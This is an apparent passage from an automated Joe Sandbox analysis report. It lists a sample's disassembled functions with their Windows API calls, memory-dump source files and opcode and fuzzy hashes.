                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4104443479-0
                                                                                                                                                                                      • Opcode ID: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                                                                                                                                                                                      • Instruction ID: 3f248080c67b1374afc6b8d6e75f286bcf9f76012f9d9347af3b5cf920229337
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                                                                                                                                                                                      • Instruction Fuzzy Hash: CA017CB5201502AFC3059B28C891E39F7AAFFC53107148259E929C7782CB31BC22CBE0
                                                                                                                                                                                      Function 0090CAEE Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4104443479-0
                                                                                                                                                                                      • Opcode ID: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                                                                                      • Instruction ID: ec0e8aa7f9838b14f4f9fff23a2e5f683326708f0b271a8320b06cc3d366e788
                                                                                                                                                                                      • Opcode Fuzzy Hash: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                                                                                      • Instruction Fuzzy Hash: CF01F9B22047056ED3249B39D807B66BBD8DF84760F508A2EF95ACB1D1FB75E450CA50
                                                                                                                                                                                      Function 009430AC Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4104443479-0
                                                                                                                                                                                      • Opcode ID: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
                                                                                                                                                                                      • Instruction ID: 5e8bfdfc10afa571065085dfbac4603d1110e510e5c0445654f452569f197cf1
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2601F432305225ABCB24DF2DD891EAB77A9FFC5314714802EF90ACB245D631E902C7D0
                                                                                                                                                                                      Function 0091F2D0 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4104443479-0
                                                                                                                                                                                      • Opcode ID: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                                                                                                                                                                      • Instruction ID: 1a10f2809b28cde66998e562c3150ad92581a74bae99977d9d23c2e1c8123ef6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C01DB3120860DEBCB246F28D841F9B7BAD9FC1360B14893DF8A947195D735989687A1
                                                                                                                                                                                      Function 00905116 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CharUpperBuffW.USER32(00000000,?,00000000,?,?,?,00905A39,?,?,?,-00000003,00000000,00000000), ref: 0090514E
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: BuffCharUpper
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3964851224-0
                                                                                                                                                                                      • Opcode ID: 7127261ff34fe6e913efe43d914942ea50ab123fa805976187c592ee9b074e5d
                                                                                                                                                                                      • Instruction ID: c551226eb77d01a32d2979e35296f1263105b02de90abcc3a6102ee242f9caf8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7127261ff34fe6e913efe43d914942ea50ab123fa805976187c592ee9b074e5d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 64F0F679209E25AFC7116B54D80072BF779EF80F60F018129F845466D1CB70D820DFC4
                                                                                                                                                                                      Function 009595AF Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • WSAStartup.WSOCK32(00000202,?), ref: 009595C9
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Startup
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 724789610-0
                                                                                                                                                                                      • Opcode ID: d74c352e707eaeb8f70bae078efbbae01d4ad99b91d837c3de6d637c36ad6e02
                                                                                                                                                                                      • Instruction ID: 8a28950a9832a4e68bd55554338230d2690bb18a79897451b3ea66cd1d2f6c34
                                                                                                                                                                                      • Opcode Fuzzy Hash: d74c352e707eaeb8f70bae078efbbae01d4ad99b91d837c3de6d637c36ad6e02
                                                                                                                                                                                      • Instruction Fuzzy Hash: 82E065776052186BC310EA64DC45FABB799BF85720F14875ABDA4872C1DA30D914C7D1
                                                                                                                                                                                      Function 00903E39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,009034E2,?,00000001), ref: 00903E6D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                      • Opcode ID: 0204218a1550a3befbdf9e81fabfbe626e3ff8a3789b282729a489f8f908672e
                                                                                                                                                                                      • Instruction ID: 2efd2201e7cb390d6aa8c960d2df9b231a4d64f20a42415a06fe79c71f940727
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0204218a1550a3befbdf9e81fabfbe626e3ff8a3789b282729a489f8f908672e
                                                                                                                                                                                      • Instruction Fuzzy Hash: CFF03971505751CFCB349F65D894812BBE8AF04715324CE3EE1D682AA1C7319A44DF00
                                                                                                                                                                                      Function 009479F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00947A11
                                                                                                                                                                                        • Part of subcall function 00907E53: _memmove.LIBCMT ref: 00907EB9
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FolderPath_memmove
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3334745507-0
                                                                                                                                                                                      • Opcode ID: c8a92e14d8d07c7710111379746303bfd41a2e13851e148f1bf008e2f406c7c5
                                                                                                                                                                                      • Instruction ID: cee2952a2a8f91f26afc0ebbd4518b6cfacb179488fb8c78726b33a1f3669dce
                                                                                                                                                                                      • Opcode Fuzzy Hash: c8a92e14d8d07c7710111379746303bfd41a2e13851e148f1bf008e2f406c7c5
                                                                                                                                                                                      • Instruction Fuzzy Hash: CDD05EA65002282FDB50E6749C09EFB76ADC744154F0002A0786DD2192E920AE4587E0
                                                                                                                                                                                      Function 00946852 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00946623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,0094685E,?,?,?,00974A5C,0099E448,00000003,?,?), ref: 009466E2
                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,009C22E8,00000000,00000000,?,?,?,00974A5C,0099E448,00000003,?,?,00904C44,?,?), ref: 0094686C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$PointerWrite
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 539440098-0
                                                                                                                                                                                      • Opcode ID: 73a7a56daca077f7ddb09bfc9554442bac81dea154d247b77f2f85dbe3acd506
                                                                                                                                                                                      • Instruction ID: a44181ddfc8deea975f67e86aab5198506f4ce1f468ba37eba3313e6ff636a41
                                                                                                                                                                                      • Opcode Fuzzy Hash: 73a7a56daca077f7ddb09bfc9554442bac81dea154d247b77f2f85dbe3acd506
                                                                                                                                                                                      • Instruction Fuzzy Hash: B1E04636000208BBDB20AF94D805F8ABBB8EF04310F00051AF94191150D7B1AA149BA1
                                                                                                                                                                                      Function 0090193B Relevance: 1.5, APIs: 1, Instructions: 18windowtimeCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00901952
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSendTimeout
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1599653421-0
                                                                                                                                                                                      • Opcode ID: c717d2b9ca778464f0f0a53edadd06f631fa3d66f492272474315f1ac825059b
                                                                                                                                                                                      • Instruction ID: 11b75c04b5b1b7ec276d1624091f3a8abe097e587b5915e0fd3a7897a841fff5
                                                                                                                                                                                      • Opcode Fuzzy Hash: c717d2b9ca778464f0f0a53edadd06f631fa3d66f492272474315f1ac825059b
                                                                                                                                                                                      • Instruction Fuzzy Hash: A3D012F169420C7EFB008761CD0BDBB776CD721F81F0046617E06D64D1D6649E099670
                                                                                                                                                                                      Function 0093E390 Relevance: 1.5, APIs: 1, Instructions: 16windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0090193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00901952
                                                                                                                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0093E3AA
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1777923405-0
                                                                                                                                                                                      • Opcode ID: 24af6141ce7452369bf51362ee3def7b8fd60662657a88223966c886f1f93972
                                                                                                                                                                                      • Instruction ID: 4b824405f9ba1c6030b895bb08c11a0cad722dcfdd130eee0d6f38398b566e97
                                                                                                                                                                                      • Opcode Fuzzy Hash: 24af6141ce7452369bf51362ee3def7b8fd60662657a88223966c886f1f93972
                                                                                                                                                                                      • Instruction Fuzzy Hash: 43D01231158110AAFA706B14FC06FC177969B40750F110459B580671E5D6D25C516640
                                                                                                                                                                                      Function 00956FC3 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: TextWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 530164218-0
                                                                                                                                                                                      • Opcode ID: b4ca2b74fe9185d905cf6658fa3ea45a83505dab27479a4db6cf5dfef9ce48bc
                                                                                                                                                                                      • Instruction ID: 83721026d14e22f90105bb82edffb1e9b5e52ea710baee730094a561fcee9e5f
                                                                                                                                                                                      • Opcode Fuzzy Hash: b4ca2b74fe9185d905cf6658fa3ea45a83505dab27479a4db6cf5dfef9ce48bc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 30D09E362245149FC701EF99DC44C8677E9FF5D7503058051F549DB371D621FC50AB94
                                                                                                                                                                                      Function 00904FB3 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,009749DA,?,?,00000000), ref: 00904FC4
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                      • Opcode ID: ffde68c3534e19514f800ee4cad9c85021bd97113017565de9875b486f100266
                                                                                                                                                                                      • Instruction ID: 9c77a32fc0e2f16e386f2c816fc86263c6f5872e37bc4fa259be13fb344a5fe8
                                                                                                                                                                                      • Opcode Fuzzy Hash: ffde68c3534e19514f800ee4cad9c85021bd97113017565de9875b486f100266
                                                                                                                                                                                      • Instruction Fuzzy Hash: BAD0C974654208BFEB04CB90DC8AF9A7BBCEB04718F200194F600A62D0D2F2BE409B55
                                                                                                                                                                                      Function 00974DDC Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                                                                      • Opcode ID: da2d5aaea23596752661012373b22532882862b2173c7cb659b61bc79a1b70d3
                                                                                                                                                                                      • Instruction ID: 928111a9b5a9481670bee7634480b81b5cf06b8d82b948f2d0fecd7626512570
                                                                                                                                                                                      • Opcode Fuzzy Hash: da2d5aaea23596752661012373b22532882862b2173c7cb659b61bc79a1b70d3
                                                                                                                                                                                      • Instruction Fuzzy Hash: 15D0C9B16052009BE7205F69E80478AB7E9AF84311F248829E5C6862B5D77AA8E29B11
                                                                                                                                                                                      Function 009050EC Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,009050BE,?,00905088,?,0090BE3D,009C22E8,?,00000000,?,00903E2E,?,00000000,?), ref: 0090510C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                                      • Opcode ID: 3842f21a35ecb4dd1f817972416b45b06f681cf6ce252d6e339026a0e5538d7c
                                                                                                                                                                                      • Instruction ID: d6b44b556acf65380df7e53ff8b20f14fa44a04a6b765e87a4e1b181d2882430
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3842f21a35ecb4dd1f817972416b45b06f681cf6ce252d6e339026a0e5538d7c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 23E09275408A02CFC2354F1AA804417FBF9EEE13613228A2ED0E982AA0D7B154869F90

                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                      Function 0096F5D0 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0091AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0091AF8E
                                                                                                                                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0096F64E
                                                                                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0096F6AD
                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0096F6EA
                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0096F711
                                                                                                                                                                                      • SendMessageW.USER32 ref: 0096F737
                                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 0096F7A3
                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 0096F7C4
                                                                                                                                                                                      • GetKeyState.USER32(00000009), ref: 0096F7D1
                                                                                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0096F7E7
                                                                                                                                                                                      • GetKeyState.USER32(00000010), ref: 0096F7F1
                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0096F820
                                                                                                                                                                                      • SendMessageW.USER32 ref: 0096F843
                                                                                                                                                                                      • SendMessageW.USER32(?,00001030,?,0096DE69), ref: 0096F940
